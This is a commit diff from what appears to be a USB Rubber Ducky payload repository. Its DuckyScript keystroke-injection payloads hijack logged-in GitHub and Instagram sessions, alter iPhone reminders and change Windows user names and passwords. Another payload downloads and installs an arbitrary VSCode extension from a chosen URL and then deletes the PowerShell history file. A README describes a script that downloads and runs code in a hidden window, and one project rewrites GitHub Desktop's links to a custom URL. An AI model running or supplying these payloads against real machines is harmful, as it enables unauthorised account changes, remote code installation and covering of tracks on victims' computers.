# Target : Windows 10/11 #
# #
###################################################
END_REM
REM Requirements:
REM - Internet connection
REM - Logged in Github
REM - PayloadStudio >= 1.3.1
REM You must set the new Profile Settings
DEFINE #NAME example
DEFINE #BIO example
DEFINE #CUSTOM-PRONOUNS example
DEFINE #URL example
DEFINE #SOCIAL-ACCOUNT-1 example
DEFINE #SOCIAL-ACCOUNT-2 example
DEFINE #SOCIAL-ACCOUNT-3 example
DEFINE #SOCIAL-ACCOUNT-4 example
DEFINE #COMPANY example
DEFINE #LOCATION example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 500
STRINGLN powershell
DELAY 500
STRINGLN Start-Process "https://github.com/settings/profile"; exit;
REM It depends by the computer power and by the internet connection power
DELAY 2000
REPEAT 37 TAB
STRING #NAME
REPEAT 4 TAB
STRING #BIO
TAB
REPEAT 4 DOWNARROW
STRING #CUSTOM-PRONOUNS
TAB
STRING #URL
TAB
STRING #SOCIAL-ACCOUNT-1
TAB
STRING #SOCIAL-ACCOUNT-2
TAB
STRING #SOCIAL-ACCOUNT-3
TAB
STRING #SOCIAL-ACCOUNT-4
TAB
STRING #COMPANY
TAB
STRING #LOCATION
REPEAT 4 TAB
ENTER
DELAY 2000
ALT-F4

View File

@ -2,7 +2,7 @@
This script can be used to change the windows user name. This script can be used to change the windows user name.
**Category**: Execute **Category**: Execution
## Description ## Description
@ -18,4 +18,26 @@ It is absurd that you can do so many things on windows without asking for permis
```DuckyScript ```DuckyScript
DEFINE NEW_NAME example DEFINE NEW_NAME example
``` ```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -3,7 +3,7 @@ REM # |
REM # Title : Change Windows User Name | REM # Title : Change Windows User Name |
REM # Author : Aleff | REM # Author : Aleff |
REM # Version : 1.0 | REM # Version : 1.0 |
REM # Category : Execute | REM # Category : Execution |
REM # Target : Windows 10/11 | REM # Target : Windows 10/11 |
REM # | REM # |
REM ############################################# REM #############################################

View File

@ -2,7 +2,7 @@
Through this script you will be able to change windows user's password super fast. Through this script you will be able to change windows user's password super fast.
**Category**: Execute **Category**: Execution
## Description ## Description
@ -25,4 +25,26 @@ It is always very fascinating to see how many things you can do on Windows syste
![](docs/2.png) ![](docs/2.png)
- `STRINGLN Get-ExecutionPolicy -List` - `STRINGLN Get-ExecutionPolicy -List`
![](docs/3.png) ![](docs/3.png)
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -3,7 +3,7 @@ REM # |
REM # Title : Change the password of the Windows user | REM # Title : Change the password of the Windows user |
REM # Author : Aleff | REM # Author : Aleff |
REM # Version : 1.0 | REM # Version : 1.0 |
REM # Category : Execute | REM # Category : Execution |
REM # Target : Windows 10-11 | REM # Target : Windows 10-11 |
REM # | REM # |
REM ############################################################ REM ############################################################

View File

@ -19,10 +19,28 @@ Opens PowerShell hidden, download a Python script, execute it, remove Python scr
* Internet Connection * Internet Connection
* Windows 10,11 * Windows 10,11
### Executing program
* Plug in your device
### Settings ### Settings
- No settings - Plug-And-Play - No settings - Plug-And-Play
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -0,0 +1,52 @@
# Delete A Reminder On An iPhone
This script can be used to delete a reminder really fast using an iPhone, so iOS system.
Open search bar, then open the Reminder app (I used the italian name so 'Promemoria'), then delete what is (hidden) stored and write the number, then call it.
**Category**: Execution
## Dependencies
* The phone must be unlocked
## Test
- iPhone 14
- iOS 16.4.1
## Settings
- You need to change the name of the application according to the language you have on your phone.
```DuckyScript
[21] DEFINE #REMINDER-APP-NAME example
```
- You should know the reminder name that you want to delete
```DuckyScript
[23] DEFINE #REMINDER-NAME example
```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -0,0 +1,41 @@
REM_BLOCK
###################################################
# #
# Title : Delete A Reminder On An iPhone #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : iPhone #
# #
###################################################
END_REM
REM Requirements:
REM - The phone must be unlocked
REM Tested on:
REM - iPhone 14
REM - iOS 16.4.1
REM You need to change the name of the application according to the language you have on your phone.
DEFINE #REMINDER-APP-NAME example
REM You should know the reminder name that you want to delete
DEFINE #REMINDER-NAME example
DELAY 500
GUI SPACE
DELAY 300
STRINGLN #REMINDER-APP-NAME
DELAY 2000
GUI f
DELAY 1000
STRING #REMINDER-NAME
DELAY 500
TAB
DELAY 500
GUI a
BACKSPACE
DELAY 500
ENTER
DELAY 500
GUI h

View File

@ -0,0 +1,58 @@
# Edit A Reminder On An iPhone
This script can be used to change a reminder name really fast using an iPhone, so iOS system.
Open search bar, then open the REMINDER app (I used the italian name so 'Promemoria'), then delete what is (hidden) stored and write the number, then call it.
**Category**: Execution
## Dependencies
* The phone must be unlocked
## Test
- iPhone 14
- iOS 16.4.1
## Settings
- You need to change the name of the application according to the language you have on your phone.
```DuckyScript
[21] DEFINE #REMINDER-APP-NAME
```
- You should know the old name of the reminder that you want to change
```DuckyScript
[23] DEFINE #OLD-REMINDER-NAME example
```
- Here you should set the new reminder name
```DuckyScript
[25] DEFIN #NEW-REMINDER-NAME example
```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -0,0 +1,42 @@
REM_BLOCK
#################################################
# #
# Title : Edit A Reminder On An iPhone #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : iPhone #
# #
#################################################
END_REM
REM Requirements:
REM - The phone must be unlocked
REM Tested on:
REM - iPhone 14
REM - iOS 16.4.1
REM You need to change the name of the application according to the language you have on your phone.
DEFINE #REMINDER-APP-NAME example
REM You should know the old name of the reminder that you want to change
DEFINE #OLD-REMINDER-NAME example
REM Here you should set the new reminder name
DEFIN #NEW-REMINDER-NAME example
DELAY 500
GUI SPACE
DELAY 300
STRINGLN #REMINDER-APP-NAME
DELAY 2000
GUI f
DELAY 1000
STRING #OLD-REMINDER-NAME
DELAY 500
TAB
DELAY 500
GUI a
BACKSPACE
STRINGLN #NEW-REMINDER-NAME
DELAY 500
GUI h

View File

@ -33,4 +33,26 @@ DEFINE PATH_TO_DESKTOP_FILE example/path
- You must know the original desktop name file, if you don't know it you can rich this information download the app on you system and going to /usr/share/applications/ searching this one app, i.e. the desktop file name of Signal application is signal-desktop.desktop, so in this case you should put signal-desktop.desktop - You must know the original desktop name file, if you don't know it you can rich this information download the app on you system and going to /usr/share/applications/ searching this one app, i.e. the desktop file name of Signal application is signal-desktop.desktop, so in this case you should put signal-desktop.desktop
```DuckyScript ```DuckyScript
DEFINE ORIGINAL_DESKTOP_FILE_NAME example DEFINE ORIGINAL_DESKTOP_FILE_NAME example
``` ```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -18,10 +18,6 @@ A script used to detect all executable files in a Linux system. An executable fi
* Linux system * Linux system
### Executing program
* Plug in your device
### Settings ### Settings
* You can edit the content that you want to put into the executable file. * You can edit the content that you want to put into the executable file.
@ -29,4 +25,26 @@ A script used to detect all executable files in a Linux system. An executable fi
```Shell ```Shell
# You can put whatever you want into the executable file # You can put whatever you want into the executable file
echo "/bin/sh" > "$file" echo "/bin/sh" > "$file"
``` ```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -0,0 +1,50 @@
# Follow someone on Instagram
This script can be used to prank friends by having them follow an Instagram account or it can be used by yourself to speed up this process.
Open a PowerShell, start a process trough the default browser that go to an instagram link like this one `https://www.instagram.com/alessandro_greco_aka_aleff/` closing the PowerShell. Then use some TABs to go to Follow button and then close the browser.
**Category**: Execution
## Note
Tested on:
- Windows 11 Eng
- Firefox Browser Eng
## Dependencies
* Internet Connection
* Instagram account logged in
## Settings
- You must set the Instagram account that you want to follow i.e. https://www.instagram.com/alessandro_greco_aka_aleff/
`[18] DEFINE #INSTAGRAM_LINK example`
- It depends by the computer power and by the internet connection power
`[72] DELAY 2000`
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -0,0 +1,81 @@
REM_BLOCK
################################################
# #
# Title : Follow someone on Instagram #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 #
# #
################################################
END_REM
REM Requirements:
REM - Internet Connection
REM - Instagram account logged in
REM You must set the Instagram account that you want to follow i.e. https://www.instagram.com/alessandro_greco_aka_aleff/
DEFINE #INSTAGRAM_LINK example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 500
STRINGLN powershell
DELAY 2000
STRINGLN Start-Process "#INSTAGRAM_LINK"; exit;
REM It depends by the computer power and by the internet connection power
DELAY 2000
REM Go to Follow button and click it
REPEAT 12 TAB
DELAY 500
ENTER
DELAY 1000
REM Close the Browser
ALT F4

View File

@ -0,0 +1,98 @@
# Install Any Arbitrary VSCode Extension
This DuckyScript script is designed to automate the installation of any arbitrary Visual Studio Code (VSCode) extension on Windows 10. It performs the following tasks:
1. Removes any pre-existing version of the extension (if applicable).
2. Downloads a ZIP archive of a VSCode extension.
3. Extracts the extension to the correct VSCode extensions folder.
The script makes use of PowerShell to manage file paths and execute commands necessary for the installation process. The user must provide the name of the extension folder and the link to the ZIP archive containing the extension.
## First Of All!
Installing Arbotrary Visual Studio Code (VSCode) extensions can pose cybersecurity risks because extensions, often developed by third parties, have access to critical functionalities of the editor and the operating system. A malicious extension could execute harmful code, access local files, or exfiltrate sensitive data without the user's knowledge. Additionally, if extensions are not from trusted sources or are not regularly updated, they may contain vulnerabilities that attackers can exploit, compromising the security of both the system and the entire development environment.
So...
- Before doing these tests make sure you have full permission from the owner of the computer in case it is not you.
- Always check the source and source code before doing this
- If even one line of code is not clear to you, you should not proceed at all because it takes only a little to do damage.
## Features
- Detects Windows passively through [PASSIVE_WINDOWS_DETECT](https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt) by Hak5.
- Installs a VSCode extension by downloading a ZIP file and extracting it to the correct location.
- Removes any previous version of the extension.
- Completely automated, requiring no manual intervention once the script is executed.
## Requirements
- **Target OS**: Windows 10/11
- **VSCode Path**: The script assumes that VSCode is installed in its default location. If it is installed in a different location, the paths in the script may need to be updated.
- **Compilation**: Make sure that the extension you are going to install has the out folder inside, that is, the folder that is generated as a result of compilation. Without this folder the extension cannot be loaded properly.
- **Internet Connection**: This is mandatory in case you want to download the archive from the Internet, whereas if you want to download from a server in the intranet you only need to be connected to the local network. This basically depends on the individual case....
## Usage
### DuckyScript Configuration
Before running the script, make sure to configure the following two variables in the script:
1. `#EXTENSION_NAME`: Replace this with the name of the folder where the extension will be installed.
```plaintext
DEFINE #EXTENSION_NAME example
```
Example: If the extension folder name is `DuckyScriptCookbook`, then replace `example` with `DuckyScriptCookbook`.
2. `#ARCHIVE_LINK`: Replace this with the actual URL to the ZIP file of the VSCode extension you want to install.
```plaintext
DEFINE #ARCHIVE_LINK https://example.com/path/to/archive.zip
```
### PowerShell Commands Breakdown
- **Detecting and Removing Previous Extension**: The script checks if an official version of the extension is already installed and removes it:
```powershell
$extensionsPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
if (Test-Path -Path $extensionsPath -PathType Container) {
Remove-Item -Recurse -Force -Path $extensionsPath
}
```
- **Downloading and Extracting the New Extension**: The script downloads the extension from the link provided inside a temporary folder and extracts it inside the official (the default) VSCode extensions folder:
```powershell
$url = "#ARCHIVE_LINK"
$downloadPath = "$env:TEMP\#EXTENSION_NAME.zip"
$extractPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
Invoke-WebRequest -Uri $url -OutFile $downloadPath
if (Test-Path -Path $downloadPath) {
Expand-Archive -Path $downloadPath -DestinationPath $extractPath -Force
Remove-Item -Path $downloadPath -Force
}
```
## Notes
- Ensure that the ZIP file is structured properly (i.e., it contains all necessary files for the extension) before attempting to install.
- Make sure that PowerShell is available on the target machine.
- This script is intended for Windows 10/11 systems. Compatibility with other versions of Windows has not been tested.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -0,0 +1,88 @@
REM_BLOCK
##########################################################
# #
# Title : Install Any Arbitrary VSCode Extension #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10 #
# #
##########################################################
END_REM
REM Replace "example" with the name of the extension folder
DEFINE #EXTENSION_NAME example
REM Replace "https://example.com/path/to/archive.zip" with your own ZIP Archive link
DEFINE #ARCHIVE_LINK https://example.com/path/to/archive.zip
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRINGLN PowerShell
DELAY 1000
STRINGLN_POWERSHELL
$extensionsPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
if (Test-Path -Path $extensionsPath -PathType Container) {
Remove-Item -Recurse -Force -Path $extensionsPath
}
END_STRINGLN
REM May it depends by the extension...
DELAY 2000
STRINGLN_POWERSHELL
$url = "#ARCHIVE_LINK"
$downloadPath = "$env:TEMP\#EXTENSION_NAME.zip"
$extractPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
Invoke-WebRequest -Uri $url -OutFile $downloadPath
if (Test-Path -Path $downloadPath) {
Expand-Archive -Path $downloadPath -DestinationPath $extractPath -Force
Remove-Item -Path $downloadPath -Force
Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
}
END_STRINGLN

View File

@ -0,0 +1,55 @@
# Install Official VSCode Extension
This script automates the installation of an official Visual Studio Code extension on Windows 10/11 systems. The extension to be installed is specified via the `publisher.extensionName` parameter. The script uses passive operating system detection to determine if the system is running Windows, and proceeds with the extension installation accordingly.
## First Of All!
Installing Arbotrary Visual Studio Code (VSCode) extensions can pose cybersecurity risks because extensions, often developed by third parties, have access to critical functionalities of the editor and the operating system. A malicious extension could execute harmful code, access local files, or exfiltrate sensitive data without the user's knowledge. Additionally, if extensions are not from trusted sources or are not regularly updated, they may contain vulnerabilities that attackers can exploit, compromising the security of both the system and the entire development environment.
So...
- Before doing these tests make sure you have full permission from the owner of the computer in case it is not you.
- Always check the source and source code before doing this
- If even one line of code is not clear to you, you should not proceed at all because it takes only a little to do damage.
## Features
- **Passive Windows Detection:** The script includes an extension (`PASSIVE_WINDOWS_DETECT`) that passively detects if the operating system is Windows.
- **VSCode Extension Installation:** It uses the `code --install-extension` command to install the specified VSCode extension.
- **Windows 10/11 Compatibility:** Designed to work on Windows 10 and 11.
- **PowerShell History Cleanup:** After installation, the PowerShell history is cleared.
## Usage
### Required Parameter
- **#EXTENSION**: This parameter represents the ID of the VSCode extension you wish to install. The ID should follow the format `publisher.extensionName` (e.g., `Aleff.duckyscriptcookbook`).
## Requirements
- **Operating System**: Windows 10 or 11
- **PowerShell**
- **Visual Studio Code**
- **Internet**
- **Permissions to execute commands in PowerShell**
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -0,0 +1,64 @@
REM_BLOCK
#####################################################
# #
# Title : Install Official VSCode Extension #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 #
# #
#####################################################
END_REM
REM replace 'publisher.extensionName' with the publisher id and extension id, for istance 'Aleff.duckyscriptcookbook'
DEFINE #EXTENSION publisher.extensionName
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRINGLN PowerShell
DELAY 1000
STRINGLN code --install-extension #EXTENSION; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit

View File

@ -4,7 +4,7 @@ This script can be used to change some advanced Windows settings to make it as e
This script is Plug-And-Play <3 This script is Plug-And-Play <3
**Category**: Execute **Category**: Execution
![](Make_Windows_performant_but_ugly_and_boring.gif) ![](Make_Windows_performant_but_ugly_and_boring.gif)
@ -16,4 +16,26 @@ The script opens the Windows advanced settings via sysdm.cpl and accesses the ad
### Dependencies ### Dependencies
* Nothing is needed, this script is Plug-And-Play <3 * Nothing is needed, this script is Plug-And-Play <3
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -3,7 +3,7 @@ REM # |
REM # Title : Make Windows performant (but ugly and boring) | REM # Title : Make Windows performant (but ugly and boring) |
REM # Author : Aleff | REM # Author : Aleff |
REM # Version : 1.0 | REM # Version : 1.0 |
REM # Category : Execute | REM # Category : Execution |
REM # Target : Windows 10/11 | REM # Target : Windows 10/11 |
REM # | REM # |
REM ################################################################## REM ##################################################################

View File

@ -0,0 +1,46 @@
# Play A Song On An iPhone
This script can be used to play a song really fast using an iPhone, so iOS system.
Open search bar, then open the Music app (I used the italian name so 'Telefono'), then delete what is (hidden) stored and write the number, then call it.
**Category**: Execution
## Dependencies
* The phone must be unlocked
## Test
- iPhone 14
- iOS 16.4.1
## Settings
- You need to change the name of the application according to the language you have on your phone.
```DuckyScript
[20] DEFINE #MUSIC-APP-NAME example
```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -0,0 +1,30 @@
REM_BLOCK
##############################################
# #
# Title : Play A Song On An iPhone #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : iPhone #
# #
##############################################
END_REM
REM Requirements:
REM - The phone must be unlocked
REM Tested on:
REM - iPhone 14
REM - iOS 16.4.1
REM You need to change the name of the application according to the language you have on your phone.
DEFINE #MUSIC-APP-NAME example
DELAY 500
GUI SPACE
DELAY 300
STRINGLN #MUSIC-APP-NAME
DELAY 1000
SPACE
DELAY 500
GUI h

View File

@ -0,0 +1,69 @@
# Replace Links In GithubDesktop
This script is written in **DuckyScript** and is designed to modify links in the GitHub Desktop application on Windows 10/11 systems. It automates the replacement of GitHub URLs with a custom URL defined by the user.
![](https://github.com/aleff-github/Deposito/blob/main/Replace_Links_In_GithubDesktop/GithubDesktop.gif?raw=true)
## Table of Contents
- [Features](#features)
- [Prerequisites](#prerequisites)
- [Usage](#usage)
- [Credits](#credits)
## Features
This script replaces the hardcoded GitHub links in the `renderer.js` and `main.js` files inside the GitHub Desktop application with a custom link provided by the user. It does the following:
1. Detects the installation folder of GitHub Desktop.
2. Identifies the latest installed version of GitHub Desktop. It may happen that there are multiple versions on the computer but it is always the most recent one that is used, I would suggest to Github Desktop developers to remove old versions that unnecessarily burden a computer.
3. Replaces any occurrences of GitHub URLs in the `renderer.js` and `main.js` files with a new link defined by the user.
The script uses **PowerShell** to perform this replacement after detecting the operating system and target files.
## Prerequisites
- **Windows 10/11**
- **GitHub Desktop** installed on the machine.
## Usage
1. **Modify the script**:
- Define the new URL to replace the original GitHub link by modifying the `#NEW_LINK` variable in the script:
```duckyscript
DEFINE #NEW_LINK example.com
```
2. **Customization**:
- Ensure that the path to GitHub Desktop is correct. If GitHub Desktop is installed in a non-default location, modify the `#SUBDIRECTORY` variable accordingly:
```ducky
DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop
```
3. **Execution**:
- Upon execution, the script will:
- Open PowerShell.
- Detect the GitHub Desktop installation directory.
- Replace all GitHub URLs in the `renderer.js` and `main.js` files with the new URL you specified.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -0,0 +1,109 @@
REM_BLOCK
#####################################################
# #
# Title : Replace Links In GithubDesktop #
# Author : Aleff #
